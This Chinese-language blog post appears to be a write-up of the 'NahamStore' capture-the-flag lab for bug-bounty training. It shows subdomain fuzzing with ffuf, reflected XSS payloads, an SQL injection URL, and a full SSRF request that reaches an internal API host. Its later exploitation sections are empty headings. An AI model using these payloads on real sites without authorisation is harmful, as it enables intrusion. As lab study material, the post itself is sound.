Stack Ashes
Go back

nahamstore

题目描述

难度:中 描述:在这个房间里,您将学习漏洞赏金狩猎和 Web 应用程序黑客的基础知识 前置条件:

基本信息

🚀本地机器信息目标机器信息
IP10.17.5.12110.10.100.228
OSkalilinux
NahamStore 的创建是为了测试您通过 NahamSec 的“漏洞赏金狩猎和 Web 应用程序黑客简介”Udemy 课程所学到的知识。 部署机器,获得 IP 地址后,请继续下一步!

由 @NahamSec 创建的 Udemy 课程 | 由 @adamtlangley 创建的实验室

信息搜集

端口扫描

子域枚举

ffuf -u http://nahamstore.thm -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -H "Host: FUZZ.nahamstore.thm" -fw 125

shop                    [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 732ms]
www                     [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 311ms]
marketing               [Status: 200, Size: 2025, Words: 692, Lines: 42, Duration: 353ms]
stock                   [Status: 200, Size: 67, Words: 1, Lines: 1, Duration: 415ms]
WWW                     [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 413ms]

截至目前我发现了三个在线站点

http://nahamstore.thm/ http://marketing.nahamstore.thm/ http://stock.nahamstore.thm/

路径枚举

漏洞发现

XSS

http://marketing.nahamstore.thm/?error=<script>alert(1)</script>
http://nahamstore.thm/product?id=1&name=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E
http://nahamstore.thm/search?q=%27%2Balert(1)%2B%27

SQL注入

http://nahamstore.thm/product?id=2

SSRF

POST /stockcheck HTTP/1.1

Host: nahamstore.thm

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 69

Origin: http://nahamstore.thm

Connection: keep-alive

Referer: http://nahamstore.thm/product?id=2

Cookie: session=023eb953d53167fef31a620a71d256d9; token=7708256ecdefdd7e793acf8e488e9be9

Priority: u=0



product_id=2&server=stock.nahamstore.thm@internal-api.nahamstore.thm#

XXE

RCE2

漏洞利用

webshell

usershell

rootshell

知识点回顾

  1. 子域枚举
  2. 目录枚举
  3. 内容发现
  4. 模糊测试 GET & POST 参数
  5. XSS(跨站点脚本)
  6. XSS 旁路
  7. 存储型 XSS、反射型 XSS
  8. 打开重定向
  9. CSRF(跨站点请求伪造)
  10. CSRF 保护绕过
  11. IDOR (不安全的直接对象引用)
  12. LFI (本地文件包含)
  13. LFI 旁路
  14. SSRF(服务器端请求伪造)
  15. SSRF 旁路
  16. XXE(XML 外部实体注入)
  17. 通过 XLSX 文件进行盲 XXE
  18. RCE (远程代码执行)
  19. 密码猜测
  20. 编辑页面以获取 PHP 反向 shell
  21. 命令注入
  22. 基于错误的 SQL 注入
  23. 基于盲目的 SQL 注入

总结

加深了漏洞出现点和如何burpsuite的一些技巧。

Share this post on:
Share this post via WhatsApp Share this post on Facebook Share this post on X Share this post via Telegram Share this post on Pinterest Share this post via email
Previous Post
creative-thm
Next Post
relevant-thm